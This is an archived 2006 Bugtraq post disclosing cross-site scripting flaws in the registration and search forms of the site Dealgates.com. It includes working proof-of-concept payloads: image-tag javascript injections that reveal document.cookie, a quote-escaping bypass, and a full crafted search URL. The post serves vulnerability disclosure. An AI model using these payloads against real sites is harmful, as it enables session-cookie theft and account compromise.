| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060617094316.18270.qmail@securityfocus.com> Date: 17 Jun 2006 09:43:16 -0000 From: luny@...fucktard.com To: bugtraq@...urityfocus.com Subject: Dealgates.com - XSS with cookie disclosure Dealgates.com Homepage: http://www.dealgates.com Affected files: *Input boxes when registering new account * Search box ------------------------------------- XSS vuln with cookie disclosure when registering a new account. To bypass the adding backslashes to ; and ", we use the long UTF-8 unicode of '. PoC: In the input boxes of "Your name:" and "Address". <IMG SRC=javascript:alert('XSS')> For the cookie: <IMG SRC=javascript:alert(document.cookie)> ----------------------------------- XSS vuln with cookie disclosure via search input box. For a PoC put: ">">">">">'>'>">"><<IMG SRC=javascript:alert(document.cookie)><"<"<"<"<'<'<"<" URL: https://www.dealgates.com/search.php?dealquery=%22%3E%22%3E%22%3E%22%3E%22%3E%27%3E%27%3E%22%3E%3CIMG+SRC%3Djavascript%3Aalert%28document.cookie%29%3E%3C%22%3C%27%3C%27%3C%27%3C%27%3C%27%3C%22&search_type=2 Screenshots: http://www.youfucktard.com/xsp/dealgates1.jpg http://www.youfucktard.com/xsp/dealgates2.jpg http://www.youfucktard.com/xsp/dealgates3.jpg
Powered by blists - more mailing lists